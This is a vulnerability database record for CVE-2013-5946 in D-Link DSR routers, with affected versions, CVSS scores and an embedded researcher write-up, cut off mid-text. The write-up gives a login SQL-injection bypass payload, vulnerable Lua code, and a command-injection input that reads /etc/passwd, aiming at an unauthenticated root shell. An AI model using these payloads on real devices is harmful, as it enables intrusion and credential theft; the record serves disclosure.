S /pfrm2.0/bin/nimfd /tmp/system.db 1259 root 3068 S /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN2 5 1375 root 3588 S /pfrm2.0/bin/firewalld /tmp/system.db 1560 root 0 SW< [key_timehandler] 1598 root 7776 S /pfrm2.0/bin/racoon -a 8787 -f /var/racoon_path.conf 1600 root 8036 S rvgd /tmp/system.db 1612 root 0 SW [cavium] 1621 root 8424 S vpnKAd /tmp/system.db 1685 root 5372 S /pfrm2.0/sslvpn/bin/firebase -d 1702 root 5016 S /pfrm2.0/sslvpn/bin/smm -d 1711 root 6052 S /pfrm2.0/sslvpn/bin/httpd 1712 root 2700 S /bin/sh /var/sslvpn/var/httpdKeepAlive.sh 1771 root 2680 S /pfrm2.0/bin/statusD 1933 root 3092 S /pfrm2.0/bin/loggingd /tmp/system.db 1960 root 5284 S /pfrm2.0/bin/radEap -d /tmp/system.db 1962 root 2988 S /pfrm2.0/bin/rebootd /tmp/system.db 2004 root 2988 S /pfrm2.0/bin/crond /tmp/system.db 2008 root 3260 S /pfrm2.0/bin/ntpd /tmp/system.db 2196 root 3128 S /pfrm2.0/bin/intelAmtd /tmp/system.db 2205 root 1904 S /pfrm2.0/bin/fReset 2311 root 2704 S /bin/sh /pfrm2.0/bin/release_cache.sh 2312 root 2704 S /sbin/getty -L ttyS0 115200 vt100 2463 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg30 -lf /va 2481 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg50 -lf /va 3355 root 1768 S /pfrm2.0/bin/rt2860apd 3443 root 4116 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg40 -lf /va 3451 root 4116 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg20 -lf /va 3457 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg1 -lf /var 3484 root 7836 S /pfrm2.0/bin/snmpd -p /var/run/snmp.pid 3518 root 4424 S /pfrm2.0/bin/openvpn --config /var/openvpn/openvpn.c 3630 root 1928 S /pfrm2.0/bin/dnsmasq --dns-forward-max=10000 --addn- 5353 root 2704 S -sh 7877 root 2568 S sleep 60 7953 root 2568 S sleep 60 8008 root 2704 R ps 16749 root 2704 S -sh 25690 root 0 SW< [RtmpCmdQTask] 25692 root 0 SW< [RtmpWscTask] DSR-250N>



{
  "affected_products": {
    "_id": null,
    "data": [
      {
        "_id": null,
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b43"
      },
      {
        "_id": null,
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b23"
      },
      {
        "_id": null,
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.01b46"
      },
      {
        "_id": null,
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.04b58"
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b43"
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b53"
      },
      {
        "_id": null,
        "model": "dsr-250n",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b39"
      },
      {
        "_id": null,
        "model": "dsr-250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b31"
      },
      {
        "_id": null,
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b43"
      },
      {
        "_id": null,
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b53"
      },
      {
        "_id": null,
        "model": "dsr-500n",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b51"
      },
      {
        "_id": null,
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b31"
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b25"
      },
      {
        "_id": null,
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b12"
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b36"
      },
      {
        "_id": null,
        "model": "dsr-250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b53"
      },
      {
        "_id": null,
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b27"
      },
      {
        "_id": null,
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b36"
      },
      {
        "_id": null,
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.01b50"
      },
      {
        "_id": null,
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b11"
      },
      {
        "_id": null,
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b53"
      },
      {
        "_id": null,
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b25"
      },
      {
        "_id": null,
        "model": "dsr-250",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b39"
      },
      {
        "_id": null,
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b43"
      },
      {
        "_id": null,
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b53"
      },
      {
        "_id": null,
        "model": "dsr-150",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b50"
      },
      {
        "_id": null,
        "model": "dsr-250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b23"
      },
      {
        "_id": null,
        "model": "dsr-150",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b35"
      },
      {
        "_id": null,
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b12"
      },
      {
        "_id": null,
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b43"
      },
      {
        "_id": null,
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b36"
      },
      {
        "_id": null,
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b23"
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.04b58"
      },
      {
        "_id": null,
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b25"
      },
      {
        "_id": null,
        "model": "dsr-150",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b29"
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.04b58"
      },
      {
        "_id": null,
        "model": "dsr-250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b20"
      },
      {
        "_id": null,
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b20"
      },
      {
        "_id": null,
        "model": "dsr-1000n",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b51"
      },
      {
        "_id": null,
        "model": "dsr-150n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b27"
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.01b50"
      },
      {
        "_id": null,
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b23"
      },
      {
        "_id": null,
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b11"
      },
      {
        "_id": null,
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.04b58"
      },
      {
        "_id": null,
        "model": "dsr-250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.01b56"
      },
      {
        "_id": null,
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.01b56"
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b43"
      },
      {
        "_id": null,
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b43"
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b51"
      },
      {
        "_id": null,
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b43"
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b12"
      },
      {
        "_id": null,
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b53"
      },
      {
        "_id": null,
        "model": "dsr-500",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b51"
      },
      {
        "_id": null,
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b12"
      },
      {
        "_id": null,
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b36"
      },
      {
        "_id": null,
        "model": "dsr-150",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b29"
      },
      {
        "_id": null,
        "model": "dsr-150",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b46"
      },
      {
        "_id": null,
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b25"
      },
      {
        "_id": null,
        "model": "dsr-150n",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b48"
      },
      {
        "_id": null,
        "model": "dsr-250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.01b46"
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b27"
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b11"
      },
      {
        "_id": null,
        "model": "dsr-150",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b27"
      },
      {
        "_id": null,
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b11"
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b77"
      },
      {
        "_id": null,
        "model": "dsr-1000n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-1000n",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b77"
      },
      {
        "_id": null,
        "model": "dsr-150",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-150",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b44"
      },
      {
        "_id": null,
        "model": "dsr-150n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-150n",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.05b64"
      },
      {
        "_id": null,
        "model": "dsr-250",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-250",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b44"
      },
      {
        "_id": null,
        "model": "dsr-250n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-250n",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b44"
      },
      {
        "_id": null,
        "model": "dsr-500",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-500",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b77"
      },
      {
        "_id": null,
        "model": "dsr-500n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-500n",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b77"
      },
      {
        "_id": null,
        "model": "dsr router dsr-1000",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr router dsr-1000n",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr router dsr-150",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr router dsr-150n",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr router dsr-250n",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr router dsr-500n",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.08b31"
      },
      {
        "_id": null,
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.01b56"
      },
      {
        "_id": null,
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.05b20"
      },
      {
        "_id": null,
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.01b46"
      },
      {
        "_id": null,
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.08b39"
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.06b43"
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.08b51"
      },
      {
        "_id": null,
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.05b53"
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.06b53"
      },
      {
        "_id": null,
        "model": "dsr-150n",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.05b48"
      },
      {
        "_id": null,
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "_id": null,
        "model": "dsr-500",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "_id": null,
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "_id": null,
        "model": "dsr-250",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "_id": null,
        "model": "dsr-150n",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "_id": null,
        "model": "dsr-150",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "_id": null,
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "_id": null,
        "model": "dsr-500n 1.08b77",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-500 1.08b77",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-250n 1.08b44",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-250 1.08b44",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-150n 1.05b64",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-150 1.08b44",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-1000n 1.08b77",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-1000 1.08b77",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15237"
      },
      {
        "db": "BID",
        "id": "64181"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005614"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-320"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-5946"
      }
    ]
  },
  "configurations": {
    "_id": null,
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/h:d-link:dsr-1000",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:d-link:dsr-1000_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:d-link:dsr-1000n",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:d-link:dsr-1000n_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:d-link:dsr-150",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:d-link:dsr-150_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:d-link:dsr-150n",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:d-link:dsr-150n_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:d-link:dsr-250",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:d-link:dsr-250_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:d-link:dsr-250n",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:d-link:dsr-250n_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:d-link:dsr-500",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:d-link:dsr-500_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:d-link:dsr-500n",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:d-link:dsr-500n_firmware",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005614"
      }
    ]
  },
  "credits": {
    "_id": null,
    "data": "nu11.nu11",
    "sources": [
      {
        "db": "BID",
        "id": "64181"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-320"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2013-5946",
  "cvss": {
    "_id": null,
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CVE-2013-5946",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 1.8,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2013-15237",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "VHN-65948",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2013-5946",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "CVE-2013-5946",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2013-15237",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201312-320",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-65948",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15237"
      },
      {
        "db": "VULHUB",
        "id": "VHN-65948"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005614"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-320"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-5946"
      }
    ]
  },
  "description": {
    "_id": null,
    "data": "The runShellCmd function in systemCheck.htm in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) \"Ping or Trace an IP Address\" or (2) \"Perform a DNS Lookup\" section. D-Link DSR is a wireless service router product. There is a remote arbitrary command execution vulnerability in the implementation of the D-Link DSR router family. Successful use can allow an attacker to execute arbitrary commands with root privileges. The following products and versions are affected: DSR-150 with firmware version 1.08B29 and earlier; DSR-150N with firmware version 1.05B51 and earlier; DSR-250 and DSR-250N with firmware version 1.08B39 and earlier; DSR-500, DSR-500N, DSR-1000, DSR-1000N with previous firmware versions. #\n# CVEs:                  \n#     CVE-2013-5945 - Authentication Bypass by SQL-Injection\n#     CVE-2013-5946 - Privilege Escalation by Arbitrary Command Execution\n# \n# Vulnerable Routers:    \n#     D-Link DSR-150 (Firmware \u003c v1.08B44)\n#     D-Link DSR-150N (Firmware \u003c v1.05B64)\n#     D-Link DSR-250 and DSR-250N (Firmware \u003c v1.08B44)\n#     D-Link DSR-500 and DSR-500N (Firmware \u003c v1.08B77)\n#     D-Link DSR-1000 and DSR-1000N (Firmware \u003c v1.08B77)\n#\n# Download URL:      \n#     http://tsd.dlink.com.tw\n# \n# Arch:                  \n#     mips and armv6l, Linux\n# \n# Author:                \n#     0_o -- null_null\n#     nu11.nu11 [at] yahoo.com\n#\n# Date:                  \n#     2013-08-18\n# \n# Purpose:               \n#     Get a non-persistent root shell on your D-Link DSR. \n# \n# Prerequisites:         \n#     Network access to the router ports 443 and 23. \n#     !!! NO AUTHENTICATION CREDENTIALS REQUIRED !!!\n#\n#\n# A list of identified vulns follows. 
This list is not exhaustive as I assume\n# more vulns are present that just slipped my attention. \n# The fact that D-Link implemented a backdoor user (for what reason, please??)\n# and just renamed it instead of completely removing it after it was targetted\n# by my previous exploit, as well as the triviality of those vulns I found \n# makes me suggest that more vulns are present that are comparably easy to\n# exploit. \n#\n# Since 2013-12-03, patches are available for:\n#   DSR-150:                Firmware v1.08B44\n#   DSR-150N:               Firmware v1.05B64\n#   DSR-250 and DSR-250N:   Firmware v1.08B44\n#   DSR-500 and DSR-500N:   Firmware v1.08B77\n#   DSR-1000 and DSR-1000N: Firmware v1.08B77\n# via http://tsd.dlink.com.tw\n#\n# And now, have a worthwhile read :-)\n#\n\n\n0. Contents:\n\n\n1. Vulnerability: Authentication Bypass by SQL-Injection \n                  (CVE-2013-5945)\n2. Exposure:      D-Link backdoor user\n4. Vulnerability: Use of weak hash algorithms\n5. Exposure:      Passwords are stored as plain text in config files\n6. Vulnerability: Bad permissions on /etc/shadow\n\n\n\n1. Vulnerability: Authentication Bypass by SQL-Injection\n                  (CVE-2013-5945)\n\n\n* Possible via the global webUI login form. 
\n\n* File /pfrm2.0/share/lua/5.1/teamf1lualib/login.lua contains:\n\n  function login.authenticate(tablename, tableInput)\n    local username = tableInput[\"Users.UserName\"]\n    local password = tableInput[\"Users.Password\"]\n    local cur = db.execute(string.format([[\n                  SELECT *, ROWID AS _ROWID_ FROM %s\n          WHERE %s = \u0027%s\u0027 AND %s = \u0027%s\u0027\n      ]], tablename, \"UserName\", username, \"Password\", password))\n    local result = false\n    local statusCode = \"NONE\"\n    if cur then\n      local row = cur:fetch({}, \"a\")\n      cur:close()\n      result = row ~= nil\n      if result == false then\n        statusCode = \"USER_LOGIN_INVALID_PASSWORD\"\n      end\n    end\n    return result, statusCode\n  end\n\n* This function creates an SQL statement of the form:\n\n  SELECT * FROM \"Users\" WHERE \"UserName\" = \u0027user\u0027 AND \"Password\" = \u0027pass\u0027;\n\n* Since there is a default admin user account called \"admin\" around, this is \n  easily exploitable by providing this to the login form:\n\n  username = admin\n  password = \u0027 or \u0027a\u0027=\u0027a\n\n* ...resulting in this SQL statement:\n\n  SELECT * \n    FROM \"Users\" \n    WHERE \"UserName\" = \u0027admin\u0027 \n      AND \"Password\" = \u0027\u0027 or \u0027a\u0027=\u0027a\u0027;\n\n* Old school SQL injection. Ohh, by the way... \n\n* The same fault can be found in captivePortal.lua \n  -- FREE NETWORKS FOR EVERYONE --\n\n\n\n2. \n\n* File /pfrm2.0/var/www/systemCheck.htm contains:\n\n  local function runShellCmd(command)\n      local pipe = io.popen(command .. \" 2\u003e\u00261\") -- redirect stderr to stdout\n      local cmdOutput = pipe:read(\"*a\")\n      pipe:close()\n      return cmdOutput\n  end\n  if (ButtonType and ButtonType == \"ping\") then\n  [...]\n  local cmd_ping = pingprog .. \" \" .. ipToPing .. \" \" .. options1 .. \" \u003e \" .. 
pingfile\n        globalCmdOutput = runShellCmd (cmd_ping) \n        statusMessage = \"Pinging \" .. ipToPing\n  [...]\n  elseif (ButtonType and ButtonType == \"traceroute\") then\n  [...]\n    local cmd = traceRouteProg .. \" \" .. ipToTraceRoute .. options\n    globalCmdOutput = runShellCmd(cmd)\n    statusMessage = \"Traceroute To \" .. ipToTraceRoute .. \"...\"\n  [...]\n  elseif (ButtonType and ButtonType == \"dnslookup\") then\n  [...]\n    util.appendDebugOut(\"Exec = \" .. os.execute(nsLookupProg .. \" \" .. internetNameToNsLookup .. \" \u003e \" .. nsLookupFile))\n    statusMessage = \"DNS Lookup for \" .. Tools like curl are not hindered by these checks. \n  \n* All forms allow input like this:\n  \n  localhost;\u003ccommand\u003e\n  \n  example: \n  \n  localhost;cat /etc/passwd\n  \n* This user provided value is then directly used as part of the input for the\n  call to runShellCmd(c) and thus io.popen(c) in the first form section and \n  os.execute(c) in the second form section. \n  \n* Output from user provided commands gets displayed on the next page beneath \n  the benign command output. \n  \n  example: \n  \n  [...]\n  \u003ctextarea rows=\"15\" name=\"S1\" 